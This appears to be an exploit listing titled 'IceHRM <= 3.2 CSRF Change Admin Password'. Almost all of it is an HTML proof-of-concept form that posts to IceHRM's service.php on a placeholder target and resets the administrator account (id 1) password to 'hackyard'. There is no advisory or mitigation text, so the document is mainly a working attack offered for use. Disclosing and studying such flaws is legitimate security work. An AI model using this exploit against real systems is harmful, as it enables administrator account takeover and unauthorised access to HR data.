HwcCrew

 1
 2<body>
 3
 4<form method="post" action="http://[target]/icehrm/app/service.php"> 
 5        <input type="hidden" name="t" value="User">
 6        <input type="hidden" name="a" value="ca">
 7        <input type="hidden" name="t" value="User">
 8        <input type="hidden" name="mod" value="admin=users">
 9        <input type="hidden" name="req" value='{"id":1,"pwd":"hackyard"}'>
10        <input type="submit">
11</form>
12
13</body>

IceHRM <= 3.2 CSRF Change Admin Password

Be the first to give feedback !